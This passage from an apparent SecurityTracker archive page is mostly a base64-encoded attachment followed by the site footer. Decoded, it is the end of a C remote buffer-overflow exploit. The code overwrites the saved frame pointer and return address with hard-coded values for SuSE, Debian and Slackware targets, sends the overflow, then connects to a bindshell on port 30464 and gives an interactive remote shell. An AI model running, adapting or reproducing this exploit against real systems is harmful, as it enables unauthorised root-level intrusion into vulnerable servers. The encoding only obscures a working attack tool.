KTsgaSsrKQoJCWh1bXBidWZbaV0gPSAneCc7CgkKCSNlbHNlCgkKCS8vIHRha2UgbGVu
Z3RoIG9mZiBzaGVsbGNvZGUgYW5kIG5vcHMgaW50byBhY2NvdW50IHdoZW4gd2UgaGF2
ZSBzb21lCglmb3IoaSA9IChzdHJsZW4obm9wYnVmKSArIHN0cmxlbihjb2RlKSk7IGkg
PCAoc2l6ZW9mKGh1bXBidWYpIC0gMSk7IGkrKykKICAgICAgICAgICAgICAgIGh1bXBi
dWZbaV0gPSAneCc7CgkKCSNlbmRpZgoKCQoJLy8gbWFraW5nIGxhc3QgOCBieXRlcyBv
dmVyZmxvdyBieXRlcyAoYmUgaXQgZWJwLi5iZSBpdCBlaXApCglodW1wYnVmW3NpemVv
ZihodW1wYnVmKSAtIDldID0gKGNoYXIpd1swXTsKICAgICAgICBodW1wYnVmW3NpemVv
ZihodW1wYnVmKSAtIDhdID0gKGNoYXIpd1sxXTsKICAgICAgICBodW1wYnVmW3NpemVv
ZihodW1wYnVmKSAtIDddID0gKGNoYXIpd1syXTsKICAgICAgICBodW1wYnVmW3NpemVv
ZihodW1wYnVmKSAtIDZdID0gKGNoYXIpd1szXTsKCglodW1wYnVmW3NpemVvZihodW1w
YnVmKSAtIDVdID0gKGNoYXIpd1swXTsKCWh1bXBidWZbc2l6ZW9mKGh1bXBidWYpIC0g
NF0gPSAoY2hhcil3WzFdOwoJaHVtcGJ1ZltzaXplb2YoaHVtcGJ1ZikgLSAzXSA9IChj
aGFyKXdbMl07CQoJaHVtcGJ1ZltzaXplb2YoaHVtcGJ1ZikgLSAyXSA9IChjaGFyKXdb
M107CgkKCQoJLy8gY29ubmVjdGluZyBhbmQgZ29pbmcgZm9yIHRoZSBodW1wCglpZihj
b25uZWN0KHMsIChzdHJ1Y3Qgc29ja2FkZHIgKikmc2x1dCwgc2l6ZW9mKHN0cnVjdCBz
b2NrYWRkcikpID09IC0xKSB7CgkJcGVycm9yKCIhIGNvbm5lY3QiKTsKCQlleGl0KDEp
OwoJfQoJZWxzZSB7CgkJbWVtc2V0KCZvdXRidWYsICdcMCcsIHNpemVvZihvdXRidWYp
KTsJCgkJc25wcmludGYob3V0YnVmLCBzaXplb2Yob3V0YnVmKSwgU1RSSU5HLCBhbGxp
Z25idWYsIGh1bXBidWYpOwoJCQoJCSNpZmRlZiBERUJVRwoJCWZvcihpID0gMDsgaSA8
IHNpemVvZihvdXRidWYpOyBpKyspIAoJCQlmcHJpbnRmKHN0ZGVyciwgIiEgYnl0ZSAl
ZCBbIDB4JXggXVxuIiwgaSwgb3V0YnVmW2ldKTsKCQkjZW5kaWYKCQkKCQlkbyB7CgkJ
CWZwcmludGYoc3RkZXJyLCAiISBzZW5kaW5nIHN0cmluZ1xuIik7CgkJCWxlbiArPSBz
ZW5kKHMsIG91dGJ1Ziwgc3RybGVuKG91dGJ1ZiksIDApOwoJCX0KCQl3aGlsZShsZW4g
PCBzdHJsZW4ob3V0YnVmKSk7CgkJCgkJY2xvc2Uocyk7CgkKCQlmcHJpbnRmKHN0ZGVy
ciwgIiEgZ2l2aW5nIHJlbW90ZSB0aW1lIHRvIHNldHVwIHNob3AuLi56enpcbiIpOwoJ
CXNsZWVwKDUpOwkKCQoJCWZwcmludGYoc3RkZXJyLCAiISBhdHRlbXB0aW5nIHRvIGNv
bm5lY3QgdG8gYmluZHNoZWxsXG4iKTsKCQlzID0gc29ja2V0KEFGX0lORVQsIFNPQ0tf
U1RSRUFNLCAwKTsKCQlzbHV0LnNpbl9wb3J0ID0gaHRvbnMoMzA0NjQpOwoJCWlmKGNv
bm5lY3QocywgKHN0cnVjdCBzb2NrYWRkciAqKSZzbHV0LCBzaXplb2Yoc3RydWN0IHNv
Y2thZGRyKSkgPT0gLTEpIHsKICAgICAgICAgICAgICAgIAlwZXJyb3IoIiEgY29ubmVj
dCIpOwoJCQlmcHJpbnRmKHN0ZGVyciwgIiEgY2hlY2sgMzA0NjQgd2l0aCBuYyBpbiBj
YXNlIHRhcmdldCB3YXMgc2xvd1xuIik7CiAgICAgICAgICAgICAgICAJZXhpdCgxKTsK
CQl9CgkJZWxzZSB7CgkJCWZwcmludGYoc3RkZXJyLCAiISBjb25uZWN0ZWQgdG8gcmVt
b3RlIHNoZWxsIDopXG4iKTsKCQkJaGFuZGxlc2hlbGwocyk7CgkJfQogICAgICAgIH0K
CQkKCWZwcmludGYoc3RkZXJyLCAiISBkb25lXG4iKTsKCWV4aXQoMCk7Cn0KCQp2b2lk
IHR5cGUoaW50IHR5cGUpCnsKCS8vIHN1c2UgNy4yIDEuMy4xMCAocnBtKQoJaWYodHlw
ZSA9PSAxKSB7CgkJaWN4LmFkZHJlc3MgPSAweGJmM2ZkYWY0OwoJCWljeC5hbGxpZ24g
PSAwOwoJCXJldHVybjsKCX0KCQoJLy8gZGViaWFuIDIuMi5yMiBzaWQgMS4zLjExIChk
ZWIpCglpZih0eXBlID09IDIpIHsKCQlpY3guYWRkcmVzcyA9IDB4YmVmZmRhZjQ7CgkJ
aWN4LmFsbGlnbiA9IDA7CgkJcmV0dXJuOwoJfQoJCgkvLyBzbGFja3dhcmUgOC4wLjAg
KOV0dGEpIDEuMy4xMSAodGd6KQoJaWYodHlwZSA9PSAzKSB7CgkJaWN4LmFkZHJlc3Mg
PSAweGJlZmZkYWY0OwogICAgICAgICAgICAgICAgaWN4LmFsbGlnbiA9IDA7CiAgICAg
ICAgICAgICAgICByZXR1cm47Cgl9CgoJZnByaW50ZihzdGRlcnIsICIhIHR5cGUgbm90
IGZvdW5kLi5leGl0aW5nXG4iKTsKCWV4aXQoMSk7Cn0KCgkJCnZvaWQgaGFuZGxlc2hl
bGwoaW50IHNvY2spCnsKIAljaGFyIGluYnVmWzQwOTZdLCBvdXRidWZbMTAyNF07CgoJ
ZmRfc2V0IGZkc2V0OyAKCWZwcmludGYoc3RkZXJyLCAiJCAiKTsKICAgICAKCXdoaWxl
KDEpIHsgICAgICAgIAoJCgkJRkRfWkVSTygmZmRzZXQpOwogICAgICAgIAlGRF9TRVQo
ZmlsZW5vKHN0ZGluKSwgJmZkc2V0KTsKICAgICAgICAJRkRfU0VUKHNvY2ssICZmZHNl
dCk7CgoJCXNlbGVjdChzb2NrICsgMSwgJmZkc2V0LCBOVUxMLCBOVUxMLCBOVUxMKTsK
CgkJaWYoRkRfSVNTRVQoZmlsZW5vKHN0ZGluKSwgJmZkc2V0KSkgewoJCQltZW1zZXQo
b3V0YnVmLCAnXDAnLCBzaXplb2Yob3V0YnVmKSk7CgkJCWZnZXRzKG91dGJ1Ziwgc2l6
ZW9mKG91dGJ1ZiksIHN0ZGluKTsKCQkJaWYoc3Ryc3RyKG91dGJ1ZiwgImV4aXQiKSAh
PSBOVUxMKSB7CgkJCQljbG9zZShzb2NrKTsKCQkJCXJldHVybjsKCQkJfQoJCQlpZih3
cml0ZShzb2NrLCBvdXRidWYsIHN0cmxlbihvdXRidWYpKSA8IDApIHsKCQkJCWZwcmlu
dGYoc3RkZXJyLCAiISB3cml0ZSBlcnJvclxuIik7CgkJCQlyZXR1cm47CgkJCX0KCQl9
CgoJCWlmKEZEX0lTU0VUKHNvY2ssICZmZHNldCkpIHsKCQkJbWVtc2V0KGluYnVmLCAn
XDAnLCBzaXplb2YoaW5idWYpKTsKCQkJaWYocmVhZChzb2NrLCBpbmJ1Ziwgc2l6ZW9m
KGluYnVmKSkgPCAwKSB7CgkJCQlmcHJpbnRmKHN0ZGVyciwgIiEgcmVhZCBlcnJvclxu
Iik7CgkJCQlyZXR1cm47CgkJCX0KCQkJZnB1dHMoaW5idWYsIHN0ZGVycik7CgkJCWZw
cmludGYoc3RkZXJyLCAiJCAiKTsKCQl9Cgl9Cn0K

--Hushpart_boundary_WMIWgJJQzBwtmTQMmAPDZtuHzbKojelg--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC